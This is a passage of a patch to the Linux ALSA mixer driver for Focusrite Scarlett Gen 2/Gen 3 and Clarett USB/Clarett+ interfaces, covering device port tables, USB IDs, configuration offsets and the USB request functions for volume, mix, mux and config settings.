++		{ SCARLETT2_PORT_TYPE_MIX,       0, 25 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 12 },
++		{ 0,                             0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,       0,  8 },
++		{ SCARLETT2_PORT_TYPE_PCM,      10,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_PCM,       8,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,       0, 25 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 10 },
++		{ 0,                             0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,       0, 10 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE,  0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,     0,  2 },
++		{ SCARLETT2_PORT_TYPE_NONE,      0, 24 },
++		{ 0,                             0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info clarett_2pre_info = {
++	.config_set = SCARLETT2_CONFIG_SET_CLARETT,
++	.line_out_hw_vol = 1,
++	.level_input_count = 2,
++	.air_input_count = 2,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		"Headphones L",
++		"Headphones R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  2,  4 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  0 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = {  4, 12 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 12 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  8 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0,  2 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  4 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 26 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info clarett_4pre_info = {
++	.config_set = SCARLETT2_CONFIG_SET_CLARETT,
++	.line_out_hw_vol = 1,
++	.level_input_count = 2,
++	.air_input_count = 4,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8,  6 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  0 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = {  8, 18 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 12 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 24 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info clarett_8pre_info = {
++	.config_set = SCARLETT2_CONFIG_SET_CLARETT,
++	.line_out_hw_vol = 1,
++	.level_input_count = 2,
++	.air_input_count = 8,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		NULL,
++		NULL,
++		NULL,
++		NULL,
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8, 10 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 18 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,     0,  8 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,     0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 12 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 22 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++struct scarlett2_device_entry {
++	const u32 usb_id; /* USB device identifier */
++	const struct scarlett2_device_info *info;
++	const char *series_name;
++};
++
++static const struct scarlett2_device_entry scarlett2_devices[] = {
++	/* Supported Gen 2 devices */
++	{ USB_ID(0x1235, 0x8203), &s6i6_gen2_info, "Scarlett Gen 2" },
++	{ USB_ID(0x1235, 0x8204), &s18i8_gen2_info, "Scarlett Gen 2" },
++	{ USB_ID(0x1235, 0x8201), &s18i20_gen2_info, "Scarlett Gen 2" },
++
++	/* Supported Gen 3 devices */
++	{ USB_ID(0x1235, 0x8211), &solo_gen3_info, "Scarlett Gen 3" },
++	{ USB_ID(0x1235, 0x8210), &s2i2_gen3_info, "Scarlett Gen 3" },
++	{ USB_ID(0x1235, 0x8212), &s4i4_gen3_info, "Scarlett Gen 3" },
++	{ USB_ID(0x1235, 0x8213), &s8i6_gen3_info, "Scarlett Gen 3" },
++	{ USB_ID(0x1235, 0x8214), &s18i8_gen3_info, "Scarlett Gen 3" },
++	{ USB_ID(0x1235, 0x8215), &s18i20_gen3_info, "Scarlett Gen 3" },
++
++	/* Supported Clarett USB/Clarett+ devices */
++	{ USB_ID(0x1235, 0x8206), &clarett_2pre_info, "Clarett USB" },
++	{ USB_ID(0x1235, 0x8207), &clarett_4pre_info, "Clarett USB" },
++	{ USB_ID(0x1235, 0x8208), &clarett_8pre_info, "Clarett USB" },
++	{ USB_ID(0x1235, 0x820a), &clarett_2pre_info, "Clarett+" },
++	{ USB_ID(0x1235, 0x820b), &clarett_4pre_info, "Clarett+" },
++	{ USB_ID(0x1235, 0x820c), &clarett_8pre_info, "Clarett+" },
++
++	/* End of list */
++	{ 0, NULL },
++};
++
++/* get the starting port index number for a given port type/direction */
++static int scarlett2_get_port_start_num(
++	const int port_count[][SCARLETT2_PORT_DIRNS],
++	int direction, int port_type)
++{
++	int i, num = 0;
++
++	for (i = 0; i < port_type; i++)
++		num += port_count[i][direction];
++
++	return num;
++}
++
++/*** USB Interactions ***/
++
++/* Notifications from the interface */
++#define SCARLETT2_USB_NOTIFY_SYNC          0x00000008
++#define SCARLETT2_USB_NOTIFY_DIM_MUTE      0x00200000
++#define SCARLETT2_USB_NOTIFY_MONITOR       0x00400000
++#define SCARLETT2_USB_NOTIFY_INPUT_OTHER   0x00800000
++#define SCARLETT2_USB_NOTIFY_MONITOR_OTHER 0x01000000
++
++/* Commands for sending/receiving requests/responses */
++#define SCARLETT2_USB_CMD_INIT 0
++#define SCARLETT2_USB_CMD_REQ  2
++#define SCARLETT2_USB_CMD_RESP 3
++
++#define SCARLETT2_USB_INIT_1    0x00000000
++#define SCARLETT2_USB_INIT_2    0x00000002
++#define SCARLETT2_USB_GET_METER 0x00001001
++#define SCARLETT2_USB_GET_MIX   0x00002001
++#define SCARLETT2_USB_SET_MIX   0x00002002
++#define SCARLETT2_USB_GET_MUX   0x00003001
++#define SCARLETT2_USB_SET_MUX   0x00003002
++#define SCARLETT2_USB_GET_SYNC  0x00006004
++#define SCARLETT2_USB_GET_DATA  0x00800000
++#define SCARLETT2_USB_SET_DATA  0x00800001
++#define SCARLETT2_USB_DATA_CMD  0x00800002
++
++#define SCARLETT2_USB_CONFIG_SAVE 6
++
++#define SCARLETT2_USB_VOLUME_STATUS_OFFSET 0x31
++#define SCARLETT2_USB_METER_LEVELS_GET_MAGIC 1
++
++/* volume status is read together (matches scarlett2_config_items[1]) */
++struct scarlett2_usb_volume_status {
++	/* dim/mute buttons */
++	u8 dim_mute[SCARLETT2_DIM_MUTE_COUNT];
++
++	u8 pad1;
++
++	/* software volume setting */
++	s16 sw_vol[SCARLETT2_ANALOGUE_MAX];
++
++	/* actual volume of output inc. dim (-18dB) */
++	s16 hw_vol[SCARLETT2_ANALOGUE_MAX];
++
++	/* internal mute buttons */
++	u8 mute_switch[SCARLETT2_ANALOGUE_MAX];
++
++	/* sw (0) or hw (1) controlled */
++	u8 sw_hw_switch[SCARLETT2_ANALOGUE_MAX];
++
++	u8 pad3[6];
++
++	/* front panel volume knob */
++	s16 master_vol;
++} __packed;
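++
++/* With SCARLETT2_ANALOGUE_MAX = 10 and SCARLETT2_DIM_MUTE_COUNT = 2
++ * this packed struct is 2 + 1 + 20 + 20 + 10 + 10 + 6 + 2 = 71
++ * bytes, read in one request from
++ * SCARLETT2_USB_VOLUME_STATUS_OFFSET (0x31).
++ */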
++
++/* Configuration parameters that can be read and written */
++enum {
++	SCARLETT2_CONFIG_DIM_MUTE = 0,
++	SCARLETT2_CONFIG_LINE_OUT_VOLUME = 1,
++	SCARLETT2_CONFIG_MUTE_SWITCH = 2,
++	SCARLETT2_CONFIG_SW_HW_SWITCH = 3,
++	SCARLETT2_CONFIG_LEVEL_SWITCH = 4,
++	SCARLETT2_CONFIG_PAD_SWITCH = 5,
++	SCARLETT2_CONFIG_MSD_SWITCH = 6,
++	SCARLETT2_CONFIG_AIR_SWITCH = 7,
++	SCARLETT2_CONFIG_STANDALONE_SWITCH = 8,
++	SCARLETT2_CONFIG_PHANTOM_SWITCH = 9,
++	SCARLETT2_CONFIG_PHANTOM_PERSISTENCE = 10,
++	SCARLETT2_CONFIG_DIRECT_MONITOR = 11,
++	SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH = 12,
++	SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE = 13,
++	SCARLETT2_CONFIG_TALKBACK_MAP = 14,
++	SCARLETT2_CONFIG_COUNT = 15
++};
++
++/* Location, size, and activation command number for the configuration
++ * parameters. Size is in bits and may be 1, 8, or 16.
++ */
++struct scarlett2_config {
++	u8 offset;
++	u8 size;
++	u8 activate;
++};
++
++static const struct scarlett2_config
++	scarlett2_config_items[SCARLETT2_CONFIG_SET_COUNT]
++			      [SCARLETT2_CONFIG_COUNT] =
++
++/* Devices without a mixer (Gen 3 Solo and 2i2) */
++{ {
++	[SCARLETT2_CONFIG_MSD_SWITCH] = {
++		.offset = 0x04, .size = 8, .activate = 6 },
++
++	[SCARLETT2_CONFIG_PHANTOM_PERSISTENCE] = {
++		.offset = 0x05, .size = 8, .activate = 6 },
++
++	[SCARLETT2_CONFIG_PHANTOM_SWITCH] = {
++		.offset = 0x06, .size = 8, .activate = 3 },
++
++	[SCARLETT2_CONFIG_DIRECT_MONITOR] = {
++		.offset = 0x07, .size = 8, .activate = 4 },
++
++	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
++		.offset = 0x08, .size = 1, .activate = 7 },
++
++	[SCARLETT2_CONFIG_AIR_SWITCH] = {
++		.offset = 0x09, .size = 1, .activate = 8 },
++
++/* Gen 2 devices: 6i6, 18i8, 18i20 */
++}, {
++	[SCARLETT2_CONFIG_DIM_MUTE] = {
++		.offset = 0x31, .size = 8, .activate = 2 },
++
++	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
++		.offset = 0x34, .size = 16, .activate = 1 },
++
++	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
++		.offset = 0x5c, .size = 8, .activate = 1 },
++
++	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
++		.offset = 0x66, .size = 8, .activate = 3 },
++
++	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
++		.offset = 0x7c, .size = 8, .activate = 7 },
++
++	[SCARLETT2_CONFIG_PAD_SWITCH] = {
++		.offset = 0x84, .size = 8, .activate = 8 },
++
++	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
++		.offset = 0x8d, .size = 8, .activate = 6 },
++
++/* Gen 3 devices: 4i4, 8i6, 18i8, 18i20 */
++}, {
++	[SCARLETT2_CONFIG_DIM_MUTE] = {
++		.offset = 0x31, .size = 8, .activate = 2 },
++
++	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
++		.offset = 0x34, .size = 16, .activate = 1 },
++
++	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
++		.offset = 0x5c, .size = 8, .activate = 1 },
++
++	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
++		.offset = 0x66, .size = 8, .activate = 3 },
++
++	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
++		.offset = 0x7c, .size = 8, .activate = 7 },
++
++	[SCARLETT2_CONFIG_PAD_SWITCH] = {
++		.offset = 0x84, .size = 8, .activate = 8 },
++
++	[SCARLETT2_CONFIG_AIR_SWITCH] = {
++		.offset = 0x8c, .size = 8, .activate = 8 },
++
++	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
++		.offset = 0x95, .size = 8, .activate = 6 },
++
++	[SCARLETT2_CONFIG_PHANTOM_SWITCH] = {
++		.offset = 0x9c, .size = 1, .activate = 8 },
++
++	[SCARLETT2_CONFIG_MSD_SWITCH] = {
++		.offset = 0x9d, .size = 8, .activate = 6 },
++
++	[SCARLETT2_CONFIG_PHANTOM_PERSISTENCE] = {
++		.offset = 0x9e, .size = 8, .activate = 6 },
++
++	[SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH] = {
++		.offset = 0x9f, .size = 1, .activate = 10 },
++
++	[SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE] = {
++		.offset = 0xa0, .size = 1, .activate = 10 },
++
++	[SCARLETT2_CONFIG_TALKBACK_MAP] = {
++		.offset = 0xb0, .size = 16, .activate = 10 },
++
++/* Clarett USB and Clarett+ devices: 2Pre, 4Pre, 8Pre */
++}, {
++	[SCARLETT2_CONFIG_DIM_MUTE] = {
++		.offset = 0x31, .size = 8, .activate = 2 },
++
++	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
++		.offset = 0x34, .size = 16, .activate = 1 },
++
++	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
++		.offset = 0x5c, .size = 8, .activate = 1 },
++
++	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
++		.offset = 0x66, .size = 8, .activate = 3 },
++
++	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
++		.offset = 0x7c, .size = 8, .activate = 7 },
++
++	[SCARLETT2_CONFIG_AIR_SWITCH] = {
++		.offset = 0x95, .size = 8, .activate = 8 },
++
++	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
++		.offset = 0x8d, .size = 8, .activate = 6 },
++} };
++
++/* proprietary request/response format */
++struct scarlett2_usb_packet {
++	__le32 cmd;
++	__le16 size;
++	__le16 seq;
++	__le32 error;
++	__le32 pad;
++	u8 data[];
++};
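++
++/* The fixed header is 4 + 2 + 2 + 4 + 4 = 16 bytes, so
++ * struct_size(req, data, req_size) below works out to
++ * 16 + req_size.
++ */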
++
++static void scarlett2_fill_request_header(struct scarlett2_data *private,
++					  struct scarlett2_usb_packet *req,
++					  u32 cmd, u16 req_size)
++{
++	/* sequence must go up by 1 for each request */
++	u16 seq = private->scarlett2_seq++;
++
++	req->cmd = cpu_to_le32(cmd);
++	req->size = cpu_to_le16(req_size);
++	req->seq = cpu_to_le16(seq);
++	req->error = 0;
++	req->pad = 0;
++}
++
++static int scarlett2_usb_tx(struct usb_device *dev, int interface,
++			    void *buf, u16 size)
++{
++	return snd_usb_ctl_msg(dev, usb_sndctrlpipe(dev, 0),
++			SCARLETT2_USB_CMD_REQ,
++			USB_RECIP_INTERFACE | USB_TYPE_CLASS | USB_DIR_OUT,
++			0, interface, buf, size);
++}
++
++static int scarlett2_usb_rx(struct usb_device *dev, int interface,
++			    u32 usb_req, void *buf, u16 size)
++{
++	return snd_usb_ctl_msg(dev, usb_rcvctrlpipe(dev, 0),
++			usb_req,
++			USB_RECIP_INTERFACE | USB_TYPE_CLASS | USB_DIR_IN,
++			0, interface, buf, size);
++}
++
++/* Send a proprietary format request to the Scarlett interface */
++static int scarlett2_usb(
++	struct usb_mixer_interface *mixer, u32 cmd,
++	void *req_data, u16 req_size, void *resp_data, u16 resp_size)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	struct usb_device *dev = mixer->chip->dev;
++	struct scarlett2_usb_packet *req, *resp = NULL;
++	size_t req_buf_size = struct_size(req, data, req_size);
++	size_t resp_buf_size = struct_size(resp, data, resp_size);
++	int err;
++
++	req = kmalloc(req_buf_size, GFP_KERNEL);
++	if (!req) {
++		err = -ENOMEM;
++		goto error;
++	}
++
++	resp = kmalloc(resp_buf_size, GFP_KERNEL);
++	if (!resp) {
++		err = -ENOMEM;
++		goto error;
++	}
++
++	mutex_lock(&private->usb_mutex);
++
++	/* build request message and send it */
++
++	scarlett2_fill_request_header(private, req, cmd, req_size);
++
++	if (req_size)
++		memcpy(req->data, req_data, req_size);
++
++	err = scarlett2_usb_tx(dev, private->bInterfaceNumber,
++			       req, req_buf_size);
++
++	if (err != req_buf_size) {
++		usb_audio_err(
++			mixer->chip,
++			"%s USB request result cmd %x was %d\n",
++			private->series_name, cmd, err);
++		err = -EINVAL;
++		goto unlock;
++	}
++
++	/* send a second message to get the response */
++
++	err = scarlett2_usb_rx(dev, private->bInterfaceNumber,
++			       SCARLETT2_USB_CMD_RESP,
++			       resp, resp_buf_size);
++
++	/* validate the response */
++
++	if (err != resp_buf_size) {
++		usb_audio_err(
++			mixer->chip,
++			"%s USB response result cmd %x was %d expected %zu\n",
++			private->series_name, cmd, err, resp_buf_size);
++		err = -EINVAL;
++		goto unlock;
++	}
++
++	/* cmd/seq/size should match, except when initialising:
++	 * the seq sent is 1 and the response seq is 0
++	 */
++	if (resp->cmd != req->cmd ||
++	    (resp->seq != req->seq &&
++		(le16_to_cpu(req->seq) != 1 || resp->seq != 0)) ||
++	    resp_size != le16_to_cpu(resp->size) ||
++	    resp->error ||
++	    resp->pad) {
++		usb_audio_err(
++			mixer->chip,
++			"%s USB invalid response; "
++			   "cmd tx/rx %d/%d seq %d/%d size %d/%d "
++			   "error %d pad %d\n",
++			private->series_name,
++			le32_to_cpu(req->cmd), le32_to_cpu(resp->cmd),
++			le16_to_cpu(req->seq), le16_to_cpu(resp->seq),
++			resp_size, le16_to_cpu(resp->size),
++			le32_to_cpu(resp->error),
++			le32_to_cpu(resp->pad));
++		err = -EINVAL;
++		goto unlock;
++	}
++
++	if (resp_data && resp_size > 0)
++		memcpy(resp_data, resp->data, resp_size);
++
++unlock:
++	mutex_unlock(&private->usb_mutex);
++error:
++	kfree(req);
++	kfree(resp);
++	return err;
++}
++
++/* Send a USB message to get data; result placed in *buf */
++static int scarlett2_usb_get(
++	struct usb_mixer_interface *mixer,
++	int offset, void *buf, int size)
++{
++	struct {
++		__le32 offset;
++		__le32 size;
++	} __packed req;
++
++	req.offset = cpu_to_le32(offset);
++	req.size = cpu_to_le32(size);
++	return scarlett2_usb(mixer, SCARLETT2_USB_GET_DATA,
++			     &req, sizeof(req), buf, size);
++}
++
++/* Send a USB message to get configuration parameters; result placed in *buf */
++static int scarlett2_usb_get_config(
++	struct usb_mixer_interface *mixer,
++	int config_item_num, int count, void *buf)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const struct scarlett2_config *config_item =
++		&scarlett2_config_items[info->config_set][config_item_num];
++	int size, err, i;
++	u8 *buf_8;
++	u8 value;
++
++	/* For byte-sized parameters, retrieve directly into buf */
++	if (config_item->size >= 8) {
++		size = config_item->size / 8 * count;
++		err = scarlett2_usb_get(mixer, config_item->offset, buf, size);
++		if (err < 0)
++			return err;
++		if (size == 2) {
++			u16 *buf_16 = buf;
++
++			for (i = 0; i < count; i++, buf_16++)
++				*buf_16 = le16_to_cpu(*(__le16 *)buf_16);
++		}
++		return 0;
++	}
++
++	/* For bit-sized parameters, retrieve into value */
++	err = scarlett2_usb_get(mixer, config_item->offset, &value, 1);
++	if (err < 0)
++		return err;
++
++	/* then unpack from value into buf[] */
++	buf_8 = buf;
++	for (i = 0; i < 8 && i < count; i++, value >>= 1)
++		*buf_8++ = value & 1;
++
++	return 0;
++}
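++
++/* e.g. for a 1-bit parameter with count == 3 and a stored byte of
++ * 0b101, the loop above unpacks buf[] = { 1, 0, 1 }.
++ */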
++
++/* Send SCARLETT2_USB_DATA_CMD SCARLETT2_USB_CONFIG_SAVE */
++static void scarlett2_config_save(struct usb_mixer_interface *mixer)
++{
++	__le32 req = cpu_to_le32(SCARLETT2_USB_CONFIG_SAVE);
++
++	int err = scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
++				&req, sizeof(u32),
++				NULL, 0);
++	if (err < 0)
++		usb_audio_err(mixer->chip, "config save failed: %d\n", err);
++}
++
++/* Delayed work to save config */
++static void scarlett2_config_save_work(struct work_struct *work)
++{
++	struct scarlett2_data *private =
++		container_of(work, struct scarlett2_data, work.work);
++
++	scarlett2_config_save(private->mixer);
++}
++
++/* Send a USB message to set a SCARLETT2_CONFIG_* parameter */
++static int scarlett2_usb_set_config(
++	struct usb_mixer_interface *mixer,
++	int config_item_num, int index, int value)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const struct scarlett2_config *config_item =
++	       &scarlett2_config_items[info->config_set][config_item_num];
++	struct {
++		__le32 offset;
++		__le32 bytes;
++		__le32 value;
++	} __packed req;
++	__le32 req2;
++	int offset, size;
++	int err;
++
++	/* Cancel any pending NVRAM save */
++	cancel_delayed_work_sync(&private->work);
++
++	/* Convert config_item->size in bits to size in bytes and
++	 * calculate offset
++	 */
++	if (config_item->size >= 8) {
++		size = config_item->size / 8;
++		offset = config_item->offset + index * size;
++
++	/* If updating a bit, retrieve the old value, set/clear the
++	 * bit as needed, and update value
++	 */
++	} else {
++		u8 tmp;
++
++		size = 1;
++		offset = config_item->offset;
++
++		err = scarlett2_usb_get(mixer, offset, &tmp, 1);
++		if (err < 0)
++			return err;
++
++		if (value)
++			tmp |= (1 << index);
++		else
++			tmp &= ~(1 << index);
++
++		value = tmp;
++	}
++
++	/* Send the configuration parameter data */
++	req.offset = cpu_to_le32(offset);
++	req.bytes = cpu_to_le32(size);
++	req.value = cpu_to_le32(value);
++	err = scarlett2_usb(mixer, SCARLETT2_USB_SET_DATA,
++			    &req, sizeof(u32) * 2 + size,
++			    NULL, 0);
++	if (err < 0)
++		return err;
++
++	/* Activate the change */
++	req2 = cpu_to_le32(config_item->activate);
++	err = scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
++			    &req2, sizeof(req2), NULL, 0);
++	if (err < 0)
++		return err;
++
++	/* Schedule the change to be written to NVRAM */
++	if (config_item->activate != SCARLETT2_USB_CONFIG_SAVE)
++		schedule_delayed_work(&private->work, msecs_to_jiffies(2000));
++
++	return 0;
++}
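++
++/* e.g. setting a 1-bit parameter at index 2 reads the current byte,
++ * sets or clears bit (1 << 2), writes the byte back with
++ * SCARLETT2_USB_SET_DATA, then sends the item's activate command
++ * via SCARLETT2_USB_DATA_CMD; the NVRAM save is deferred by the
++ * 2-second delayed work above.
++ */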
++
++/* Send a USB message to get sync status; result placed in *sync */
++static int scarlett2_usb_get_sync_status(
++	struct usb_mixer_interface *mixer,
++	u8 *sync)
++{
++	__le32 data;
++	int err;
++
++	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_SYNC,
++			    NULL, 0, &data, sizeof(data));
++	if (err < 0)
++		return err;
++
++	*sync = !!data;
++	return 0;
++}
++
++/* Send a USB message to get volume status; result placed in *buf */
++static int scarlett2_usb_get_volume_status(
++	struct usb_mixer_interface *mixer,
++	struct scarlett2_usb_volume_status *buf)
++{
++	return scarlett2_usb_get(mixer, SCARLETT2_USB_VOLUME_STATUS_OFFSET,
++				 buf, sizeof(*buf));
++}
++
++/* Send a USB message to get the volumes for all inputs of one mix
++ * and put the values into private->mix[]
++ */
++static int scarlett2_usb_get_mix(struct usb_mixer_interface *mixer,
++				 int mix_num)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	int num_mixer_in =
++		info->port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
++	int err, i, j, k;
++
++	struct {
++		__le16 mix_num;
++		__le16 count;
++	} __packed req;
++
++	__le16 data[SCARLETT2_INPUT_MIX_MAX];
++
++	req.mix_num = cpu_to_le16(mix_num);
++	req.count = cpu_to_le16(num_mixer_in);
++
++	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_MIX,
++			    &req, sizeof(req),
++			    data, num_mixer_in * sizeof(u16));
++	if (err < 0)
++		return err;
++
++	for (i = 0, j = mix_num * num_mixer_in; i < num_mixer_in; i++, j++) {
++		u16 mixer_value = le16_to_cpu(data[i]);
++
++		for (k = 0; k < SCARLETT2_MIXER_VALUE_COUNT; k++)
++			if (scarlett2_mixer_values[k] >= mixer_value)
++				break;
++		if (k == SCARLETT2_MIXER_VALUE_COUNT)
++			k = SCARLETT2_MIXER_MAX_VALUE;
++		private->mix[j] = k;
++	}
++
++	return 0;
++}
++
++/* Send a USB message to set the volumes for all inputs of one mix
++ * (values obtained from private->mix[])
++ */
++static int scarlett2_usb_set_mix(struct usb_mixer_interface *mixer,
++				 int mix_num)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	struct {
++		__le16 mix_num;
++		__le16 data[SCARLETT2_INPUT_MIX_MAX];
++	} __packed req;
++
++	int i, j;
++	int num_mixer_in =
++		info->port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
++
++	req.mix_num = cpu_to_le16(mix_num);
++
++	for (i = 0, j = mix_num * num_mixer_in; i < num_mixer_in; i++, j++)
++		req.data[i] = cpu_to_le16(
++			scarlett2_mixer_values[private->mix[j]]
++		);
++
++	return scarlett2_usb(mixer, SCARLETT2_USB_SET_MIX,
++			     &req, (num_mixer_in + 1) * sizeof(u16),
++			     NULL, 0);
++}
++
++/* Convert a port number index (per info->port_count) to a hardware ID */
++static u32 scarlett2_mux_src_num_to_id(
++	const int port_count[][SCARLETT2_PORT_DIRNS], int num)
++{
++	int port_type;
++
++	for (port_type = 0;
++	     port_type < SCARLETT2_PORT_TYPE_COUNT;
++	     port_type++) {
++		if (num < port_count[port_type][SCARLETT2_PORT_IN])
++			return scarlett2_ports[port_type].id | num;
++		num -= port_count[port_type][SCARLETT2_PORT_IN];
++	}
++
++	/* Oops */
++	return 0;
++}
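++
++/* e.g. for the 6i6 Gen 2 input counts (1 none, 4 analogue,
++ * 2 S/PDIF, ...), source number 0 maps to id 0x000 ("Off"),
++ * numbers 1-4 map to 0x080-0x083 (Analogue 1-4), and numbers 5-6
++ * map to 0x180-0x181 (S/PDIF 1-2).
++ */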
++
++/* Convert a hardware ID to a port number index */
++static u32 scarlett2_mux_id_to_num(
++	const int port_count[][SCARLETT2_PORT_DIRNS], int direction, u32 id)
++{
++	int port_type;
++	int port_num = 0;
++
++	for (port_type = 0;
++	     port_type < SCARLETT2_PORT_TYPE_COUNT;
++	     port_type++) {
++		int base = scarlett2_ports[port_type].id;
++		int count = port_count[port_type][direction];
++
++		if (id >= base && id < base + count)
++			return port_num + id - base;
++		port_num += count;
++	}
++
++	/* Oops */
++	return -1;
